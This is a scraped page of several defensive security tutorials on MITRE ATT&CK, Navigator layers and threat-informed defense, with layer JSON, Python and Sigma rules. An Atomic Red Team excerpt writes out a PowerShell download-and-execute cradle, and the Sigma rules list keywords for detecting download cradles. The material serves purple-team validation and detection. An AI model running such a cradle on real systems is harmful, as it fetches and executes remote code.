• CTI is analyzed, decision-ready knowledge about adversaries — not a raw IOC feed — produced by a disciplined six-phase lifecycle.
• The four intelligence types (strategic, operational, tactical, technical) trade durability against immediacy; technical IOCs decay in minutes while strategic intelligence endures for years.
• STIX 2.1, TAXII 2.1, and TLP standardize how intelligence is represented, exchanged, and handled — enforce TLP at ingestion so TLP:RED never leaks downstream.
• The Diamond Model, Kill Chain, Pyramid of Pain, and MITRE ATT&CK interlock; TTP-level intelligence at the pyramid apex outlasts IOC-level intelligence at its base.
• Operationalize CTI by converting ATT&CK techniques into Sigma rules and matching IOC feeds against Sysmon EventID 1/3/7/22, closing the loop with stakeholder feedback.

Related Tutorials

• Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Red Teaming Fundamentals: Mindset, Methodology, and Engagement Types
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers

References

• MITRE ATT&CK® – Adversary Emulation Plans
• MITRE ATT&CK® – Get Started: Threat Intelligence
• MITRE ATT&CK® for Cyber Threat Intelligence (CTI) Training
• NIST SP 800-150 – Guide to Cyber Threat Information Sharing
• CISA – Service Models for Cyber Threat Intelligence (White Paper)
• CISA – Cyber Threat Information Sharing (CTIS) – Shared Cybersecurity Services

Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers

Objective: Understand how to use MITRE ATT&CK Navigator to build, annotate, combine, and export technique layers — the JSON layer format, per-technique annotation fields, gap analysis via score expressions, programmatic generation, and the operational security controls around layer files for threat-informed defense and adversary emulation.

1. What Is ATT&CK Navigator and Why It Matters

ATT&CK Navigator is a web-based tool for annotating and exploring ATT&CK matrices. It visualizes defensive coverage, supports red/blue team planning, and tracks the frequency of detected techniques. It is a meta-tool: it generates no host telemetry and maps to no single ATT&CK technique. Instead, it is the primary planning surface for structured adversary emulation and threat-informed defense.

The unit of work is the layer — a JSON file scoped to one ATT&CK domain and matrix version, listing techniques with whatever annotations have been applied. Layers can store a default view configuration (sorting, visible platforms) and can be authored interactively in the UI or generated programmatically.

The current release is v5.3.2 (April 21, 2026). The hosted instance lives at mitre-attack.github.io/attack-navigator/.

2. Tool Setup: Hosted Instance vs. Self-Hosted

The hosted instance is the fastest start. Layer files uploaded to it stay client-side — nothing is stored on MITRE’s servers. Despite that, MITRE recommends running your own instance if your layer files contain sensitive content.

Navigator is a dynamic web application that runs on Node.js and Angular CLI, and installs on Linux. A self-hosted instance can be air-gapped and fed local STIX bundles via the customDataURL field or customDataURL query parameter.

git clone https://github.com/mitre-attack/attack-navigator.git
cd attack-navigator/nav-app
npm install
ng serve   # serves the Navigator on localhost:4200

Self-hosted configuration lives in nav-app/src/assets/config.json. The banner setting (default empty string) displays HTML content at the top of the page. The features array lists togglable features; setting enabled: false on a feature hides all of its control elements.

3. Anatomy of a Layer: The JSON Schema

The current specification is Version 4.5 of the layer file format. Field names are case-sensitive — techniqueID, not techniqueId.

A minimal valid layer:

{
  "name": "Detection Coverage Baseline",
  "versions": {
    "attack": "15",
    "navigator": "5.3.2",
    "layer": "4.5"
  },
  "domain": "enterprise-attack",
  "description": "Blue-team detection posture",
  "techniques": []
}

The sorting field controls ordering within each tactic: 0 ascending by name, 1 descending by name, 2 ascending by score, 3 descending by score.

4. Building a Layer from Scratch (UI Walkthrough)

Open Navigator and select Create New Layer. Choose a domain (Enterprise, Mobile, or ICS) and an ATT&CK version — these become the domain and versions.attack fields. The matrix renders with every tactic as a column and techniques stacked beneath.

Use search to query by keyword, and multiselect to bulk-select techniques by platform, data source, or tactic. Selecting a technique highlights it; the right-click context menu and the technique controls bar apply annotations to the current selection. Expand a parent technique to reveal and individually annotate its sub-techniques (showSubtechniques: true).

This is the core discipline: select the techniques relevant to your engagement or coverage assessment, then annotate the selection rather than each cell one at a time.

5. Annotating Techniques: Colors, Scores, Comments, Metadata, and Links

Each object in the techniques array supports these fields:

"techniques": [
  {
    "techniqueID": "T1078",
    "color": "#fc3b3b"
  },
  {
    "techniqueID": "T1059.001",
    "tactic": "execution",
    "score": 75,
    "comment": "Script Block Logging on; no behavioral alert yet"
  },
  {
    "techniqueID": "T1055",
    "enabled": false,
    "metadata": [
      { "name": "owner", "value": "detection-eng" },
      { "name": "ticket", "value": "DET-4412" }
    ]
  }
]

Scored techniques draw their fill color from the gradient. Define a red→yellow→green scale to read low coverage at a glance:

"gradient": {
  "colors": ["#ff6666", "#ffe766", "#8ec843"],
  "minValue": 0,
  "maxValue": 100
}

Make the scale legible to stakeholders with legendItems:

"legendItems": [
  { "label": "No Coverage", "color": "#ff6666" },
  { "label": "Logged Only", "color": "#ffe766" },
  { "label": "Alerted",     "color": "#8ec843" }
]

Use an explicit color for binary states (in-scope vs. out-of-scope), and score + gradient for graded coverage. Set enabled: false to grey out techniques irrelevant to the assessment so the heat-map stays readable.

6. Working with Pre-Built Threat Group Layers

ATT&CK publishes pre-built Navigator layers for documented threat groups. From any group’s page on attack.mitre.org, use the option to view or export the group’s technique usage as a Navigator layer — stored as a JSON file.

Import these as the baseline for adversary emulation planning: the group layer becomes the what they do, and your detection-coverage layer becomes the what you can see. Loading the group’s JSON via Open Existing Layer instantly highlights every technique attributed to that adversary across the matrix.

7. Combining Layers: Gap Analysis via Score Expressions

Layers compose. Create New Layer → Create Layer from Other Layers lets Navigator produce a calculated layer from arithmetic over loaded layers, which is how you build gap analysis without spreadsheets.

Each open layer is assigned a variable (a, b, c). Entering a score expression of a+b+c combines scores across three threat-group layers, surfacing technique overlap among multiple adversaries.

The high-value workflow for detection engineering: load the adversary group layer (a) and your detection-coverage layer (b), then evaluate b - a. Techniques the adversary uses but you cannot detect render with negative scores — these are your prioritized work items. Set sorting: 3 to float the highest-scored (or, inverted, the worst-gap) techniques to the top of each tactic.

{
  "name": "Coverage Gap (b - a)",
  "domain": "enterprise-attack",
  "sorting": 3,
  "gradient": {
    "colors": ["#ff6666", "#ffffff", "#8ec843"],
    "minValue": -100,
    "maxValue": 100
  }
}

8. Programmatic Layer Generation with Python

Author layers at scale with mitreattack-python. Query the STIX data for a named intrusion-set, collect the techniques tied to it, and serialize a v4.5 layer dict.

import json
from mitreattack.stixdata import MitreAttackData

mad = MitreAttackData("enterprise-attack.json")

group = mad.get_groups_by_alias("APT29")[0]
techniques = mad.get_techniques_used_by_group(group["id"])

annotations = []
for t in techniques:
    attack_id = mad.get_attack_id(t["object"]["id"])
    annotations.append({
        "techniqueID": attack_id,
        "score": 1,
        "comment": "Attributed via STIX intrusion-set relationship"
    })

layer = {
    "name": f"{group['name']} TTPs",
    "versions": {"attack": "15", "navigator": "5.3.2", "layer": "4.5"},
    "domain": "enterprise-attack",
    "description": "Auto-generated group layer",
    "techniques": annotations,
    "gradient": {"colors": ["#ffffff", "#fc3b3b"], "minValue": 0, "maxValue": 1}
}

with open("apt_layer.json", "w") as f:
    json.dump(layer, f, indent=2)

Generated JSON round-trips straight back into the UI via Open Existing Layer. Consuming a finished layer is equally simple — ingest it into reporting tooling and emit a Markdown gap table:

import json

with open("coverage_gap.json") as f:
    layer = json.load(f)

print("| Technique | Score | Comment |")
print("|---|---|---|")
for t in layer["techniques"]:
    print(f"| {t['techniqueID']} | {t.get('score','-')} | {t.get('comment','')} |")

9. Exporting Layers: JSON, SVG, Excel, and Multi-Layer Bundles

Search and filter the matrix to the exact view you want, then export it.

Embed a hosted layer directly in a report or internal portal with the layerURL query parameter:

<iframe
  src="https://mitre-attack.github.io/attack-navigator/#layerURL=https://intranet.local/layers/coverage_gap.json"
  width="100%" height="900" frameborder="0">
</iframe>

10. Layer Versioning and Migration

The sub-techniques update replaced many techniques with sub-techniques carrying new IDs, so layers authored before that release may not render correctly in newer matrices. The official update-layers.py script both upgrades a layer to the latest format and remaps technique IDs to their replacers where possible.

python3 update-layers.py --input old_layer.json --output migrated_layer.json

The in-app layer upgrade wizard (added in v5.x alongside STIX 2.1 Collection Index and TAXII 2.1 support) walks changed techniques interactively: it lists each technique’s previous and current state with links to both versions. Enable show annotated techniques only to focus on your annotations, then copy them from the previous version to the current one.

11. Common Attacker Techniques

Navigator is a planning tool — the “techniques” it manipulates are ATT&CK TTPs encoded as techniqueID values. The table below shows representative primitives a red team maps post-engagement and a blue team scores for coverage.

Each cell in Navigator links to the technique’s ATT&CK page, which exposes Data Sources, Detections, and Mitigations — use Navigator as the bridge into those fields, not the endpoint.

12. Defensive Strategies & Detection

The Navigator generates no telemetry; the defensive concern is twofold — layer-file OPSEC and translating scores into real detection.

Layer-file operational security:
– Layer JSON may contain red-team TTPs, engagement timelines, and detection-gap scoring. Do not upload sensitive layers to the public hosted instance.
– Hosted-instance uploads stay client-side, but run a self-hosted, access-controlled instance (auth proxy or VPN-only) for operational data.
– Version-control layers in Git with access controls equal to other sensitive operational documentation.

Translating scores to detection: a technique scored 0 in your coverage layer should map to a missing Sysmon rule, ETW subscription, or audit policy. Cross-reference each low-scored techniqueID against the ATT&CK page’s data sources. For T1059.001 (PowerShell): Sysmon Event ID 1 (Process Create), Event ID 4104 (Script Block Logging via the Microsoft-Windows-PowerShell ETW provider), and audit policy Audit Process Creation.

A Sigma rule sketch for the missing detection identified by a gap layer:

title: Suspicious PowerShell Script Block Execution
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - 'IEX'
      - 'DownloadString'
      - 'FromBase64String'
  condition: selection
level: high

Overlaying an adversary layer (a) against a coverage layer (b) with the score expression b - a surfaces negative-score techniques — adversary TTPs you cannot detect — as the highest-priority detection-engineering backlog.

13. Tools for Layer Analysis

14. MITRE ATT&CK Mapping

Navigator has no technique ID of its own — it is a blue/purple-team planning tool. Its ATT&CK relevance is the technique IDs you place inside layers and the detection guidance each one links to.

Summary

• ATT&CK Navigator is the standard planning surface for threat-informed defense and adversary emulation — it visualizes coverage, it does not attack.
• Layers are v4.5-format JSON files scoped to one domain; per-technique fields (techniqueID, score, color, comment, metadata, enabled) drive the heat-map.
• Score expressions like b - a turn adversary and coverage layers into automatic gap analysis, surfacing undetectable TTPs as detection-engineering work.
• Generate layers programmatically with mitreattack-python, migrate them with update-layers.py, and export to JSON, SVG, or Excel.
• Treat layer files as sensitive: self-host with access control, version them in Git, and cross-reference every low score against real Sysmon/ETW/audit-policy detections.

Related Tutorials

• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Introduction to MITRE ATT&CK: Structure, Tactics, Techniques, and Sub-Techniques
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Building a Red Team Lab: Infrastructure, VMs, and C2 Setup
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle

References

• ATT&CK Navigator – Official GitHub Repository (mitre-attack/attack-navigator)
• ATT&CK Navigator USAGE.md – Building, Annotating & Exporting Layers
• ATT&CK Navigator Layer File Format Specification v4.5
• ATT&CK Navigator Layers README – Examples & Programmatic Generation
• MITRE ATT&CK – Adversary Emulation Plans (Official)
• MITRE ATT&CK – Getting Started: Adversary Emulation and Red Teaming

Introduction to MITRE ATT&CK: Structure, Tactics, Techniques, and Sub-Techniques

Objective: Understand what the MITRE ATT&CK knowledge base is, how it is structured — domains, matrices, tactics, techniques, sub-techniques, and procedures — and how defenders, threat hunters, and authorized red teamers use it as a shared operational language for threat-informed defense and adversary emulation.

1. What Is MITRE ATT&CK and Why It Matters

MITRE ATT&CK is a living, open-source knowledge base that documents real-world adversary tactics, techniques, and procedures (TTPs). It was created by the MITRE Corporation and first released in 2013. ATT&CK focuses on how attackers behave — the actions they take inside an environment — rather than on the indicators of compromise (IOCs) they leave behind.

This distinction matters. IOCs (hashes, IPs, domains) are brittle and disposable; an adversary rotates them cheaply. Behaviors — injecting code, dumping credentials, abusing valid accounts — are expensive to change. ATT&CK catalogs the durable behaviors, grounded in empirical evidence from intrusions observed across industries and geographies.

ATT&CK builds on the Lockheed Martin Cyber Kill Chain (Hutchins, Cloppert & Amin, 2011). The Matrix columns are ordered roughly along the chronological flow of an intrusion, but ATT&CK goes deeper, enumerating concrete mechanisms under each phase rather than naming abstract stages.

2. The Three Domains: Enterprise, Mobile, and ICS

ATT&CK is partitioned into three domains, each with its own matrices.

This site focuses on Enterprise ATT&CK because it covers the Windows, Linux, and cloud surfaces most relevant to blue teams, DFIR, and authorized red teaming.

3. Tactics, Techniques, Sub-Techniques, and Procedures

The ATT&CK data model is a four-level hierarchy. Each level answers a different question.

Tactics represent the “why.” Techniques represent the “how.” Sub-techniques describe a narrower variation. For example, the technique Account Manipulation (T1098) encompasses sub-techniques such as Additional Email Delegate Permissions (T1098.002) and Exchange Email Delegate Permissions (T1098.003), each detailing a distinct method.

Procedures are the real-world implementations — specific tools, malware families, or hands-on-keyboard methods observed in active campaigns. This is what makes ATT&CK actionable: you can study the actual tradecraft, not just the abstraction.

4. Walking the Enterprise Matrix: The 14 Tactics

The Matrix column headings are the tactics, presented in roughly chronological order. The cells under each column are the techniques that achieve that tactical objective. The baseline below reflects ATT&CK v16.1 (14 tactics, 203 techniques, 453 sub-techniques). For reference, v18 lists 14 tactics, 216 techniques, 475 sub-techniques, 44 mitigations, and over 1,700 analytics. Always pin counts to a version.

v19 note (April 2026): ATT&CK v19 introduced a major structural change — the Defense Evasion tactic (TA0005) was split into two new tactics, Stealth and Defense Impairment. TA0005 is deprecated in the current release. Retrieve the exact new tactic IDs and transition guidance from attack.mitre.org/resources/updates/ before mapping against v19.

5. Anatomy of a Technique Page

Every technique page is a structured record. Take T1059.001 — PowerShell (a sub-technique of T1059 Command and Scripting Interpreter, under Execution).

A technique can belong to multiple tactics. The Detection section lists data source / data component pairs, free-text analytic notes, and — since v14 — structured pseudocode analytics from the MITRE Cyber Analytics Repository (CAR). These data-source fields tell you exactly which telemetry to collect.

6. Related Objects: Groups, Software, Campaigns, and Mitigations

ATT&CK is more than a list of behaviors. A graph of related objects ties techniques to threat intelligence.

This turns the Matrix into an operational tool: not just “T1056.001 exists,” but which group uses it, with what software, in which campaign, and which mitigations apply. The Group pages are the entry point for threat-actor-centric research and emulation planning.

7. Programmatic Access via STIX and the ATT&CK Python Library

ATT&CK is published as STIX 2.1 — the structured threat intelligence format from the OASIS CTI Technical Committee. In STIX, an intrusion-set object (Group) links to attack-pattern objects (techniques/sub-techniques), malware and tool objects (software), and campaign objects. MITRE distributes the bundles on GitHub.

The canonical library is mitreattack-python (github.com/mitre-attack/mitreattack-python). Load a bundle and query the data model directly.

from mitreattack.stix2 import MitreAttackData

mitre = MitreAttackData("enterprise-attack.json")

# List every technique under the Persistence tactic (TA0003)
for t in mitre.get_techniques_by_tactic("persistence", "enterprise-attack"):
    print(mitre.get_attack_id(t.id), t.name)

Fetch a single technique by its ATT&CK ID and inspect the schema fields:

tech = mitre.get_object_by_attack_id("T1059.001", "attack-pattern")
print(tech.name)                 # PowerShell
print(tech.x_mitre_platforms)    # ['Windows']
for phase in tech.kill_chain_phases:
    print(phase.phase_name)      # execution

Walk the relationship graph to list every Group observed using a technique:

for g in mitre.get_groups_using_technique(tech.id):
    grp = g["object"]
    print(mitre.get_attack_id(grp.id), grp.name, grp.aliases)

The raw attack-pattern object behind that technique looks like this (trimmed and annotated):

{
  "type": "attack-pattern",
  "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
  "name": "PowerShell",
  "x_mitre_platforms": ["Windows"],
  "x_mitre_is_subtechnique": true,
  "kill_chain_phases": [
    { "kill_chain_name": "mitre-attack", "phase_name": "execution" }
  ],
  "external_references": [
    {
      "source_name": "mitre-attack",
      "external_id": "T1059.001",
      "url": "https://attack.mitre.org/techniques/T1059/001"
    }
  ]
}

To stay current across releases, diff two STIX bundles to surface added or modified techniques:

# Illustrative: compare two domain bundles and emit a change report
from mitreattack.diffStix.changelog_helper import get_new_changelog_md

get_new_changelog_md(
    old="enterprise-attack-16.1.json",
    new="enterprise-attack-18.0.json",
    domains=["enterprise-attack"],
    markdown_file="attack-v16-to-v18-changes.md",
)

8. The ATT&CK Navigator and Coverage Layers

The ATT&CK Navigator renders the Matrix as an interactive heat map. You assign scores and colors to techniques to build layers — coverage maps for detection engineering, gap analysis, and emulation scoping. Layers are JSON and version-controllable.

{
  "name": "Detection Coverage - Execution & Persistence",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1059.001", "score": 100, "color": "#31a354",
      "comment": "Sysmon EID 1 + Script Block Logging" },
    { "techniqueID": "T1547.001", "score": 50, "color": "#fee08b",
      "comment": "Partial registry telemetry" },
    { "techniqueID": "T1055", "score": 0, "color": "#de2d26",
      "comment": "No process-injection detection" }
  ]
}

Overlay an adversary’s known techniques (red) against your detection coverage (green) and the white space is your gap list.

9. Applying ATT&CK in Defense and Authorized Emulation

As a defender, map every SIEM alert and detection rule to a technique ID. Build Navigator layers to measure coverage, then prioritize engineering against the techniques most relevant to your threat model — threat-informed defense instead of blanket coverage.

As an authorized red teamer / adversary emulator, pull a Group page (e.g., a relevant APT), extract its technique set, and build a TTP-driven emulation plan. This is fundamentally different from vulnerability-based scoping: you exercise the behaviors the defense must catch. Tools like MITRE CALDERA and Atomic Red Team chain ATT&CK-mapped tests so blue and red teams speak the same IDs.

10. Common Attacker Techniques

The framework catalogs thousands of behaviors. A handful illustrate the model’s range and the important fact that one technique can serve multiple tactics.

T1078 (Valid Accounts) is the teaching case: it appears under four tactics — Initial Access, Persistence, Privilege Escalation, and Defense Evasion — because the same behavior serves different adversary goals depending on context.

11. Defensive Strategies & Detection

Because ATT&CK is structural, the goal here is wiring it into your detection workflow. Each technique page lists Data Sources (e.g., Process, Command, Windows Registry, Network Traffic) and Data Components (e.g., Process Creation, Network Connection Creation). These map directly to telemetry you must collect.

On Windows, Sysmon supplies much of that telemetry.

Sigma is the vendor-neutral detection format that carries ATT&CK IDs in its tags block, letting every rule trace back to a technique and tactic.

title: PowerShell EncodedCommand Execution
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
tags:
  - attack.execution        # tactic name (lowercase)
  - attack.t1059.001        # sub-technique ID (lowercase)
level: medium

Mitigations use M#### IDs (verify against attack.mitre.org/mitigations/enterprise/ before citing in production):

12. Tools for ATT&CK Analysis

13. MITRE ATT&CK Mapping

Every other tutorial on this site closes with a mapping table. Read it as technique → tactic → context. This is the worked example.

14. Summary

• MITRE ATT&CK is a behavior-based, empirically grounded knowledge base of adversary TTPs — not an IOC feed.
• The data model is a hierarchy: tactics (why, TA####) → techniques (how, T####) → sub-techniques (T####.###) → procedures (real-world instances).
• Related objects — Groups (G####), Software (S####), Campaigns (C####), Mitigations (M####) — turn the Matrix into an operational, intelligence-led tool.
• Pin counts and structure to a specific version; v19 (April 2026) split Defense Evasion (TA0005) into Stealth and Defense Impairment — confirm the new IDs at attack.mitre.org/resources/updates/.
• Operationalize ATT&CK by mapping data sources to Sysmon telemetry, tagging Sigma rules with technique IDs, and tracking coverage in Navigator layers for both detection engineering and authorized emulation.

Related Tutorials

• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

References

• MITRE ATT&CK® – Getting Started (Official Resources Overview)
• Enterprise Tactics – MITRE ATT&CK®
• Enterprise Techniques – MITRE ATT&CK®
• Adversary Emulation Plans – MITRE ATT&CK®
• ATT&CK Adversary Emulation & Red Teaming – MITRE ATT&CK® Get Started
• MITRE ATT&CK: Design and Philosophy (Official PDF – Strom et al.)

Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

Objective: Understand how defenders operationalize adversary knowledge — the Pyramid of Pain, MITRE ATT&CK, the CTI lifecycle, STIX/TAXII, M3TID/INFORM, and adversary emulation — into a continuous, measurable intelligence-driven security cycle rather than reacting to brittle indicators.

1. The Problem With Reactive Defense

Indicator-centric programs fail because indicators are cheap for the adversary to change. Hashes, IP addresses, and domains rotate trivially — a recompile changes a hash; a new VPS changes an IP. As popularized by David Bianco’s Pyramid of Pain (2013), these atomic indicators detect an adversary only for a fleeting window.

The Pyramid ranks indicator types by how much pain it causes an adversary to change them:

Documenting activity at the TTP level lets defenders think at an abstraction that is concrete enough to be actionable, yet stable enough to remain valid across adversaries and over time. Unlike traditional models that focus on indicators of compromise (IOCs), behavioral defense maps how adversaries operate once inside the environment. That is the foundation of Threat-Informed Defense.

2. What Is Threat-Informed Defense?

Threat-Informed Defense (TID) is the systematic application of a deep understanding of adversary tradecraft and technology to improve defenses. The MITRE Center for Threat-Informed Defense (CTID) defines it across three operationalized dimensions:

The shift is from “Are we patched?” to “Are we defended against these adversaries?” TID is a mindset that prioritizes finite defensive budget against the behaviors that actually threaten your sector.

3. MITRE ATT&CK: Architecture and Anatomy

The MITRE ATT&CK® Framework is a globally accessible knowledge base of adversary TTPs based on real-world observations. Its core objects:

The 14 Enterprise tactics, in order: Reconnaissance (TA0043), Resource Development (TA0042), Initial Access (TA0001), Execution (TA0002), Persistence (TA0003), Privilege Escalation (TA0004), Defense Evasion (TA0005), Credential Access (TA0006), Discovery (TA0007), Lateral Movement (TA0008), Collection (TA0009), Command and Control (TA0011), Exfiltration (TA0010), Impact (TA0040). ATT&CK is versioned — always confirm IDs against attack.mitre.org.

ATT&CK is distributed as STIX 2.1. You can parse the public bundle directly to enumerate every technique:

from stix2 import MemoryStore, Filter

store = MemoryStore()
store.load_from_file("enterprise-attack.json")  # mitre/cti repo

for t in store.query([Filter("type", "=", "attack-pattern")]):
    for ref in t.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            print(ref["external_id"], "-", t["name"])

ATT&CK Navigator visualizes and compares coverage layers (JSON format), while ATT&CK Workbench lets organizations manage and extend a local copy of the knowledge base in sync with the public one.

4. The CTI Lifecycle: From Raw Data to Prioritized TTPs

Intelligence is produced, not collected ad hoc. The six-phase CTI lifecycle maps cleanly onto the TID dimensions:

Structured intelligence is exchanged with STIX 2.1 (the data model) over TAXII 2.1 (the transport, supporting Collections and Channels). Open platforms — MISP and OpenCTI — ingest STIX bundles manually, via connectors, or by subscribing to a TAXII feed.

A minimal shareable STIX bundle links a threat actor to a technique through a relationship:

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle, ExternalReference

actor = ThreatActor(name="APT29", labels=["nation-state"])

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[ExternalReference(
        source_name="mitre-attack",
        external_id="T1566.001",
        url="https://attack.mitre.org/techniques/T1566/001")])

rel = Relationship(actor, "uses", technique)
print(Bundle(actor, technique, rel).serialize(pretty=True))

Automating the loop turns a TAXII feed into a prioritized TTP list for the detection team:

from taxii2client.v21 import Server
from stix2 import parse
import csv

server = Server("https://taxii.example-isac.org/taxii2/",
                user="analyst", password="<token>")
collection = server.api_roots[0].collections[0]

ttps = []
for obj in collection.get_objects().get("objects", []):
    so = parse(obj, allow_custom=True)
    if so.get("type") == "attack-pattern":
        for ref in so.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                ttps.append((ref["external_id"], so["name"]))

with open("prioritized_ttps.csv", "w", newline="") as f:
    csv.writer(f).writerows([("technique_id", "name"), *sorted(set(ttps))])

5. Building a Sector-Specific Threat Model

You cannot defend against everything, so prioritize. Select the ATT&CK Groups relevant to your sector, extract their techniques, and weight by frequency using CTID’s Sightings Ecosystem data and the Top ATT&CK Techniques Calculator.

The mitreattack-python library pulls a group’s full technique set:

from mitreattack.stix20 import MitreAttackData

data = MitreAttackData("enterprise-attack.json")
apt29 = data.get_groups_by_alias("APT29")[0]

for entry in data.get_techniques_used_by_group(apt29.id):
    tech = entry["object"]
    print(data.get_attack_id(tech.id), tech["name"])

Layer the result in the Navigator and colour cells by your current detection status. A layer file encodes that scoring directly:

{
  "name": "Detection Coverage - APT29",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "color": "#fc3b3b", "comment": "None - no email detonation telemetry" },
    { "techniqueID": "T1059.001", "color": "#33cc33", "comment": "Detected - Script Block Logging" },
    { "techniqueID": "T1055",     "color": "#ffe766", "comment": "Partial - EDR on workstations only" }
  ]
}

6. Mapping Controls to ATT&CK: The Defensive Measures Dimension

Knowing the adversary is useless without knowing your own coverage. CTID’s Mappings Explorer lets defenders see how security capabilities map to ATT&CK, and the NIST SP 800-53 ↔ ATT&CK mappings let you assess control coverage against real-world techniques.

The critical pitfall: ATT&CK coverage ≠ detection coverage. A control that can mitigate a technique is not the same as telemetry that proves you detect it. Distinguish two gap types:

Re-run the Mappings Explorer comparison before and after each emulation cycle to quantify the coverage delta — that delta is your measurable program improvement.

7. Testing & Evaluation: Closing the Loop

T&E proves defenses work by emulating real adversary behavior. Distinguish the disciplines:

MITRE CALDERA is a scalable, automated adversary-emulation platform; Atomic Red Team (Red Canary) is a library of small, ATT&CK-mapped tests for fast technique validation; and the CTID Adversary Emulation Library provides full emulation plans modeled on real threats. Run them as purple-team exercises — red executes, blue observes, both tune in real time.

# T1059.001 - atomic test metadata (excerpt)
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
  - name: Download cradle execution
    executor:
      name: powershell
      command: |
        IEX (New-Object Net.WebClient).DownloadString('#{cradle_url}')
    input_arguments:
      cradle_url:
        type: url
        default: https://example.test/benign.ps1

# Execute one atomic test, then confirm the telemetry fired
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Map result -> Navigator: green only if Sysmon EID 1 + Script Block Log observed

If the test fires but no analytic alerts, you have found a detection gap — feed it straight back into the cycle.

8. M3TID and INFORM: Measuring Program Maturity

CTID’s M3TID (Measure, Maximize, Mature Threat-Informed Defense) operationalizes the three dimensions and assigns relative weighting:

The weighting reflects that defensive measures are where threat knowledge becomes protection. INFORM (Jan 2026) builds on M3TID, translating CTI, defensive measures, and T&E into a measurable, repeatable strategic maturity practice. Treat M3TID as the foundational reference and INFORM as its strategic-maturity successor — they are distinct publications, not synonyms. Self-assess each dimension, then invest where the lowest-weighted-adjusted score sits.

9. The Intelligence-Driven Security Cycle: Putting It All Together

The dimensions form a continuous loop, not a one-time audit:

1. Direction/CTI: Ingest sector intelligence via TAXII; extract prioritized TTPs.
2. Threat model: Layer relevant ATT&CK Groups in Navigator.
3. Defensive measures: Map controls via Mappings Explorer; identify gaps.
4. T&E: Emulate the TTP chain with CALDERA / Atomic Red Team.
5. Measure: Score coverage delta and M3TID maturity.
6. Feedback: Failed detections become new CTI collection requirements.

Each rotation tightens coverage against the adversaries you actually face. The loop never closes — new sightings continuously reshape the threat model.

10. Common Pitfalls and Maturity Anti-Patterns

• The “ATT&CK checkbox” fallacy — colouring a cell green for a control that is mapped but never validated.
• Retroactive labeling — tagging alerts with technique IDs after the fact instead of engineering proactive detections.
• IOC over-reliance — building the program on indicators near the bottom of the Pyramid of Pain.
• Treating the matrix as static — ATT&CK is versioned; threat models decay if not refreshed.
• Stale TTPs — driving investment from sightings years old without re-validation.

11. Common Attacker Techniques

These are the behaviors a TID program is built to detect — the worked examples throughout the cycle:

12. Defensive Strategies & Detection

TID succeeds only if emulation is observable. Validate that the following telemetry fires during every T&E run:

Anchor every detection to an ATT&CK ID so coverage is measurable. A skeleton Sigma rule for encoded PowerShell:

title: Suspicious PowerShell Encoded Command Execution
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
tags:
  - attack.execution
  - attack.t1059.001
  - attack.ta0002
level: medium

Hardening baselines: enable command-line process auditing (ProcessCreationIncludeCmdLine_Enabled); enforce PowerShell Constrained Language Mode with Script Block and Module Logging; deploy Sysmon with a maintained config (e.g., SwiftOnSecurity) validated against each technique’s ATT&CK data sources; enforce a TTP expiry policy (re-validate sightings older than 24 months); and configure automated TAXII ingest from ISAC/CERT networks.

13. Tools for Threat-Informed Defense

14. MITRE ATT&CK Mapping

Summary

• Threat-Informed Defense replaces brittle IOC reaction with stable, behavior-centric defense built on adversary TTPs.
• The Pyramid of Pain motivates the shift; MITRE ATT&CK supplies the shared TTP vocabulary across Tactics, Techniques, Groups, and Mitigations.
• TID’s three dimensions — CTI, Defensive Measures, Testing & Evaluation — connect through the six-phase CTI lifecycle and exchange intelligence via STIX 2.1 over TAXII 2.1.
• M3TID measures maturity (CTI 30%, DM 50%, T&E 20%); INFORM is its strategic successor.
• Close the loop with CALDERA, Atomic Red Team, and the CTID Adversary Emulation Library, validating every technique against Sysmon and ATT&CK-tagged Sigma rules.

Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Access Tokens and Privileges: The Kernel’s Security Context
• SIDs and Security Descriptors: Identity in Windows Security
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

References

• Adversary Emulation Plans | MITRE ATT&CK®
• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Get Started: Threat Intelligence | MITRE ATT&CK®
• Our Mission: Threat-Informed Defense | MITRE Center for Threat-Informed Defense (CTID)
• Adversary Emulation Library | MITRE Center for Threat-Informed Defense (CTID)
